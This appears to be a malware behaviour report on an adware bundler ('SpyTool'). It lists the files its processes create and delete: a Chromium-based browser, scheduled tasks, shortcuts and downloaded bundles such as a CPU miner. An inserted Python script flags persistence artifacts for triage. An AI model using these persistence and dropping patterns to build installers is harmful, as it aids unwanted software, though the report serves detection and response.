%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\chrome.7z (1161171 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
The SpyTool deletes the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606 (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\mybrowser.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\prefs (0 bytes)
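Buried in the file activity of 8819.exe and setup.exe are the artifacts that matter for response: two scheduled-task .job files under %WinDir%\Tasks, a self-named executable under a GUID directory in Local Settings\Application Data, shortcuts in the Start Menu, Desktop and Quick Launch, a Chromium-derived browser seeded with external_extensions.json and master_preferences, and executables fetched into the IE cache. Some of them (the GUID .job and .exe) are created and deleted again by the same process, so a triage script should distinguish what survived from what was transient. The following is an added example of that triage, not Lavasoft's code; the paths are taken verbatim from the report (plus one icon file as a negative control), while the rule set and its names are assumptions made for this example.

```python
import re

# Constructed input: a subset of the paths the report lists as created/written and
# deleted by 8819.exe, setup.exe and the NSIS temp executables, plus one benign-looking
# icon file as a negative control. Placeholders are kept exactly as the report prints them.
CREATED = [
    r"%WinDir%\Tasks\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.job",
    r"%WinDir%\Tasks\MyBrowser.job",
    r"%Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.exe",
    r"%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk",
    r"%Documents and Settings%\All Users\Desktop\MyBrowser.lnk",
    r"%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk",
    r"%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json",
    r"%Program Files%\MyBrowser\MyBrowser\Application\master_preferences",
    r"%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Bundle_OperaRUnew[1].exe",
    r"%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\BiTool[1].dll",
    r"%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico",
]
DELETED = [
    r"%WinDir%\Tasks\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.job",
    r"%Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.exe",
]

# ASSUMED rule set: (name, pattern). Each pattern targets one persistence or staging artifact.
RULES = [
    ("scheduled-task", re.compile(r"\\Tasks\\[^\\]+\.job$", re.I)),
    ("startup-shortcut", re.compile(r"\\(Start Menu|Desktop|Quick Launch)\\.*\.lnk$", re.I)),
    # directory and executable share a name, e.g. <GUID>\<GUID>.exe under Application Data
    ("self-named-exe-in-appdata", re.compile(r"\\Application Data\\([^\\]+)\\\1\.exe$", re.I)),
    ("browser-preference-seeding", re.compile(r"\\(external_extensions\.json|master_preferences)$", re.I)),
    ("binary-in-ie-cache", re.compile(r"\\Content\.IE5\\[^\\]+\\[^\\]+\.(exe|dll)$", re.I)),
]


def normalize(path: str) -> str:
    """Case-fold and trim so a created entry and its later delete entry compare equal."""
    return path.strip().lower()


def triage(created, deleted) -> list:
    """Match each created path against RULES; 'persisted' is False when the same path was later deleted."""
    gone = {normalize(p) for p in deleted}
    findings = []
    for path in created:
        for rule, rx in RULES:
            if rx.search(path):
                findings.append({"rule": rule, "path": path, "persisted": normalize(path) not in gone})
    return findings


def summarize(findings) -> dict:
    """Per-rule counts of artifacts that survived the run: the ones to look for on a live host."""
    out = {}
    for f in findings:
        if f["persisted"]:
            out[f["rule"]] = out.get(f["rule"], 0) + 1
    return out


if __name__ == "__main__":
    results = triage(CREATED, DELETED)
    for f in results:
        state = "persisted" if f["persisted"] else "transient"
        print(f"{f['rule']:28s} {state:9s} {f['path']}")
    print(summarize(results))
```

The transient entries are still worth recording: a scheduled task that existed for a moment may already have fired, and the deleted GUID-named executable is exactly the kind of file that a disk image or volume shadow copy can still recover for analysis.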
The process nsp45.tmp:596 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf48.tmp (19514 bytes)
%Program Files%\AnyProtectEx\product.guid (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\flush-inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\inetc.dll (784 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\AnyProtectEx\installer\tempfile.t (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl4A.tmp (0 bytes)
The process wmic.exe:1336 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
The process nsr21.tmp:908 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\checks.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (5929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\post_reply.htm (14 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\thankyou[1].php (0 bytes)
The process nsr18.tmp:1388 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1B.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\amisid.exe (1856 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\amisid.exe (0 bytes)
The process nsr18.tmp:460 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1E.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\amisid.exe (1856 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\amisid.exe (0 bytes)
The process nsx27.tmp:1340 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-6JM0V.tmp\nsx27.tmp (3781 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-6JM0V.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-6JM0V.tmp\nsx27.tmp (0 bytes)
The process nsx27.tmp:336 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\encrypt.exe (4185 bytes)
%Program Files%\gmsd_re_005010096\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-42CRH.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-QF5NP.tmp (15278 bytes)
%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-UJDHN.tmp (4185 bytes)
%Program Files%\gmsd_re_005010096\unins000.msg (375 bytes)
%Program Files%\gmsd_re_005010096\gamesdesktop_widget.exe (77005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\itdownload.dll (1281 bytes)
%Program Files%\gmsd_re_005010096\is-QNSOT.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\ex.bat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp (4 bytes)
%Program Files%\gmsd_re_005010096\unins000.dat (29605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-TA4AV.tmp (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-KNG9H.tmp (2105 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\av.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\encrypt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\itdownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\ex.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\CheckProc.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.exe (0 bytes)
The process encrypt.exe:1700 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.exe (24230 bytes)
The process encrypt.exe:1364 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.exe (1447 bytes)
The process encrypt.exe:1564 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.exe (31996 bytes)
The process encrypt.exe:496 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.exe (92311 bytes)
The process %original file name%.exe:860 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\7121923af824073a25b2b7e6ba0a6e0e[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd41.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf46.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy34.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp45.tmp (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\CESwN2Es[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\VuuPC_VO2_8907[1].exe (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm22.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss40.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp5.tmp (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\setup_gmsd_re[1].exe (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
